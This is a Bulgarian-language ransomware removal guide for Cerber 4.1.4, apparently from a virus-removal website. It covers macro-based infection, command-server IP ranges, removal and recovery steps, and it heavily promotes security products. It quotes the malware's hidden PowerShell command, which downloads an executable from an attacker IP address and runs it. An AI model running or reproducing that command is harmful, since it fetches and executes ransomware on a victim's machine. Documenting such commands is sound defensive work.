Степен на сериозност:  
  (99/100)

Премахни Cerber 4.1.4 вирус (Инструкции за премахване на вирус)

от Джули Сплинтърс - - | Тип: Рансъмуер

Терорът продължава – беше пуснат Cerber 4.1.4

Cerber 4.1.4 е следващата част на кибер кампанията Cerber. Изглежда по-малко от седмица, след като хакерите пуснаха Cerber 4.1.0 и Cerber 4.1.1, са решили, че това не стига и са пуснали следващата версия от серията. Тя продължава да приставя окончания на случаен принцип. Последната версия е откраднала някои неща от рансъмуера Locky, като например начина на активиране. Cerber 4.1.4 пуска Word документ и изисква да бъдат пуснати macro настройките, за да се свали главният изпълним файл. Въпреки това тази техника, която се използва от Locky, вече е широко разисквана сред IT средите. Затова потребителите, които следят трендовете в тези среди могат да избегнат кибер заплахата. Ако малуерът Ви е засегнал въпреки това, няма нужда да се паникьосвате. Първо трябва да премахнете Cerber 4.1.4 от устройството. Използвайте ReimageIntego, за да забързате процеса.

Новата версия на рансъмуера продължава да всява ужас по света. С версии 4.1.0 и 4.1.1 започна и да използва тактика, използвайки IP адрес и изпращайки UDP пакети до отдалечения си сървър за контрол. Последното издание използва три IP адреса, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, за да прехвърля техническа информация към сървъра. Подобна особеност позволява на хакерите да събират по-важна информация за устройствата на жертвата. Ненужно е да казваме, че подобни данни вдъхновяват престъпниците да подобряват стратегиите си още повече.

Cerber 4.1.4 rampages ruthlessly

Главната особеност на новата версия е начинът, по който Cerber 4.1.4 започва атаката си. Въпреки че предните версии разчитат на спам съобщения и фалшиви фактури, за да се внедряват в системите на потребителите, тази версия използва макроси. Когато жертвата отвори получения .doc файл, той вижда MS Word документ, който съдържа стринг от случайни символи и кодове. За щастие последните версии на Word не позволяват макросите по подразбиране. Затова ще бъдете попитани да ги пуснете. След това, когато настройките са променени, рансъмуера Cerber 4.1.4 пуска PowerShell. За секунди се осъществява и активацията. После приключва с надписа:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (“$env:APPDATA\winx64.exe”)

Както можете да видите подобна команда се извършва с цел сваляне и пускане на главните елементи за изпълнение – win64.exe. В случай че имате 32-битов Windows изпълнимият файл може да е win32.exe. Сега вирусът трябва да постави файла в папката %AppData%, за да постигне пълна функционалност. Както обикновено докато вирусът криптира, можете да забележите Readme.hta файл на работния плот. Когато криптиращият процес завърши картинката на работния плот ще бъде променена на бележка за откуп, която обявява хайджака от Cerber 4.1.4. Като пуска стойността MachineGuid, намираща се в HKLM\Software\Microsoft\Cryptography папката в компютъра на жертвата, генерира случайно окончание. Не си губете времето и преминете към премахването на Cerber 4.1.4.

Особености при разпространение

Вирусът предпочита да използва утвърдената техника за разпостранение – спам мейли. Въпреки че потребителите биват предупреждавани непрекъснато дане отварят фактури, официални писна или полицейски предупреждения, изпратени от неизвестни източници, броят афектирани потребители продължава да е висок. Кибер престъпниците са изгладили техниките си за подлъгване на потребителите. Въпреки това ако видите съобщение, изпратено от офиса на ФБР или данъчна институция, потвърдете изпращача, преди да отворите приставката. Можете да следите за граматически, стилитически или други грешки. Липсата на лого и креденциали на представители може да подскаже че става дума за фалшив имейл.

Възмжно ли е да заличите вируса изцяло?

Когато става дума за премахването на Cerber 4.1.4, препоръчваме да инсталирате надежден софтуер за сигурност. Обновете го след инсталация и започнете сканирането. Анти-спайуерни програми като ReimageIntego или Malwarebytes обикновено премахват Cerber 4.1.4 за няколко минути. Въпреки това ако се надявате освен това да декриптират файловете Ви, може да останете разочаровани. Има други методи, чрез които можете да го направите, въпреки че най-ефективният е чрез бекъп или оригинален декриптор. Във връзка с това прочетете по-нататък, за да се запознаете с предложенията ни за възстановяване на данни. Ако вирусът е заключил екрана или не можете да пуснете обикновени системни функции, използвайте упътванията за това как да си върнете достъпа.

Специално предложение
действай сега!
Свали
Reimage Гарантирана
Удовлетвореност
Свали
Intego Гарантирана
Удовлетвореност
Съвместим с Microsoft Windows Supported versions Съвместим с OS X Supported versions
Какво да правим, ако не успеем с премахването?
Ако не сте успели да се справите с щети, нанесени от вирус, с помощта на Reimage Intego, задайте своите въпроси на екипа ни по поддръжка и дайте колкото се може повече подробности.
Reimage Intego разполага с безплатен неограничен скенер. Reimage Intego предлага по-пълен скенер само след закупуване на платената версия. Когато безплатният скенер открие проблеми, може да ги поправите като използвате безплатната функция за ръчно възстановяване или да закупите пълната версия, за да ги поправите автоматично.
Допълнителен софтуер
Различните програми имат различни цели. Ако не успеете да поправите повредените файлове с Reimage, може да опитате с SpyHunter 5.
Допълнителен софтуер
Различните програми имат различни цели. Ако не успеете да поправите повредените файлове с Intego, може да опитате с Combo Cleaner.

Упътване за ръчно премахване на Cerber 4.1.4 вируси:

Премахнете Cerber 4.1.4, използвайки Safe Mode with Networking

 • Стъпка 1: Рестартирайте компютъра си, за да Safe Mode with Networking

  Windows 7 / Vista / XP
  1. Натиснете Start Shutdown Restart OK.
  2. Когато компютърър Ви се активира, натиснете F8 няколко пъти, докато видите прозореца Advanced Boot Options
  3. Изберете Safe Mode with Networking от списъка Изберете 'Safe Mode with Networking'

  Windows 10 / Windows 8
  1. Натиснете Power в Windows логин екран. Сега натиснете и задръжте Shift, което е на клавиатурата Ви, и след това натиснете Restart..
  2. Сега изберете Troubleshoot Advanced options Startup Settings и накрая натиснете Restart.
  3. След като компютърът Ви е активен, изберете Enable Safe Mode with Networking в Startup Settings прозореца. Изберете 'Enable Safe Mode with Networking'
 • Стъпка 2: Премахнете Cerber 4.1.4

  Влезте в заразения си акаунт и пуснете браузъра. Свалете ReimageIntego или друга добра програма за анти спайуер. Обновете я преди цялостно сканиране на системата и премахнете зловредните файлове от Вашия рансъмуер и така завършете премахването на Cerber 4.1.4.

Ако Вашият рансъмуер блокира Safe Mode with Networking, опитайте другия метод.

Премахнете Cerber 4.1.4, използвайки System Restore

 • Стъпка 1: Рестартирайте компютъра си, за да Safe Mode with Command Prompt

  Windows 7 / Vista / XP
  1. Натиснете Start Shutdown Restart OK.
  2. Когато компютърър Ви се активира, натиснете F8 няколко пъти, докато видите прозореца Advanced Boot Options
  3. Изберете Command Prompt от списъка Изберете 'Safe Mode with Command Prompt'

  Windows 10 / Windows 8
  1. Натиснете Power в Windows логин екран. Сега натиснете и задръжте Shift, което е на клавиатурата Ви, и след това натиснете Restart..
  2. Сега изберете Troubleshoot Advanced options Startup Settings и накрая натиснете Restart.
  3. След като компютърът Ви е активен, изберете Enable Safe Mode with Command Prompt в Startup Settings прозореца. Изберете 'Enable Safe Mode with Command Prompt'
 • Стъпка 2: Рестартирайте системните си файлове и настройки
  1. След като се появи Command Prompt прозорец, въведете cd restore и кликнете Enter. Въведете 'cd restore' без кавички и натиснете 'Enter'
  2. Сега напишете rstrui.exe и натиснете Enter отново.. Въведете 'rstrui.exe' без кавички и натиснете 'Enter'
  3. Когато се появи нов екран, натиснете Next и изберете Вашия restore point преди инфекцията с Cerber 4.1.4. След това натиснете Next. Когато се появи 'System Restore' прозорец, изберете 'Next' Изберете своя restore point и натиснете 'Next'
  4. Сега кликнете Yes, за да започни system restore. Натиснете 'Yes' и започнете system restore
  Веднъж щом върнете системата си до предишна верия, свалете и сканирайте компютъра си с ReimageIntego и се уверете, че премахването на Cerber 4.1.4 е извършено успешно.

Бонус: Възстановяване на информацията

Представеното по-горе ръководство има за цел да ви помогне да премахнете Cerber 4.1.4 от компютъра си. За да възстановите криптираните си файлове ви препоръчваме използването на подробно ръководство, изготвено от специалистите по компютърна сигурност на virusi.bg?

Ако файловете ви са криптирани от Cerber 4.1.4, може да използвате няколко начина за тяхното възстановяване:

Колко ефективен е Data Recovery Pro?

Това приложение може да е единствената Винадежда да си върнете поне част от криптираните данни, докато изследователи не публикуват декриптационен инструмент. Като алтернатива можете да го използвате за намране на изчезнаи файлове или поправка на повредени такива.

 • Свали Data Recovery Pro;
 • Следвайте стъпките за инсталиране на Data Recovery и инсталирайте програмата на компютъра си;
 • Стартирайте и сканирайте компютъра за криптирани файлове от рансъмуер вируса Cerber 4.1.4;
 • Възстановете ги.

Алтернатива ли е функцията Windows Previous Version ?

Въпреки разрушителната сила на този рансъмуер, може да имате шанс да си върнете част от файловете, използвайки следните стъпки. Имайте предвид, че System Recovery трябва да бъде пуснат, за да сработи тази функция.

 • Открийте криптирания файл, който искате да възстановите и кликнете с десния бутон на мишката върху него;
 • Изберете “Properties” и отидете на бутона “Previous versions”;
 • Тук проверете всички налични копия на файла “Folder versions”. Изберете версията, която искате да възстановите и кликнете върху “Restore”?

Накрая, винаги трябва да мислите за защита от крипто-рансъмуери. За да защитите компютъра си от Cerber 4.1.4 и други рансъмуери, използвайте добър анти спайуер, като например ReimageIntego, SpyHunter 5Combo Cleaner или Malwarebytes

Не позволявайте на правителството да ви шпионира

Правителствата имат много причини за проследяване на потребителски данни и шпиониране на гражданите, затова е добре да се замислите и да разберете повече за съмнителните практики за събиране на информация. За да избегнете нежелано проследяване или шпиониране, трябва да бъдете напълно анонимни в Интернет. 

Може да изберете различно местоположение, когато сте онлайн и имате достъп до желани материали без ограничение на специфично съдържание. Може да се радвате на Интернет връзка без рискове да бъдете хакнати, като използвате VPN услугата Private Internet Access.

Управлявайте информацията, която може да бъде използвана от правителството или трети страни и сърфирайте в мрежата без да бъдете шпионирани. Дори да не участвате в някакви незаконни дейности или се доверявате на избора си на услуги и платформи, имайте едно наум за собствената си сигурност и вземете превантивни мерки като използвате VPN услуга.

Архивиране на файлове в случай на атака на зловреден софтуер

Компютърните потребители могат да понесат различни загуби, които се дължат на кибер инфекции или на техни собствени грешки. Софтуерни проблеми, причинени от зловреден софтуер или загуба на информация, дължаща се на криптиране, могат да доведат до различни последици за устройството ви или дори до непоправими щети. Когато разполагате с адекватни актуални резервни файлове лесно може да се възстановите след подобен инцидент и да се върнете към работата си.

Актуализациите на резервните файлове след всяка промяна в устройството са изключителни важни, за да може да се върнете на точното място, на което сте спрели работа, когато зловреден софтуер или друг проблем с устройството е причинило загуба на информация или е прекъснало работата ви.

Когато разполагате с предишна версия на важен документ или проект, може да избегнете чувството на безсилие и стреса. Доста е полезно в случай на изненадваща зловредна атака. Използвайте Data Recovery Pro за възстановяване на системата.

За автора
Julie Splinters
Julie Splinters - Специалист по премахване на зловреден софтуер

Ако това безплатно упътване за премахване Ви е помогнало и сте доволни от нашата услуга, моля подкрепете ни, като направите дарение, за да продължим да поддържаме услугата. Дори най-малката сума ще бъде оценена.

Свържете се с Julie Splinters
За компанията Esolutions

Източник: https://www.2-spyware.com/remove-cerber-4-1-4-ransomware-virus.html
Ръководства за премахване на други езици

Вашето мнение за Cerber 4.1.4 ransomware virus

Your email address will not be published. Required fields are marked *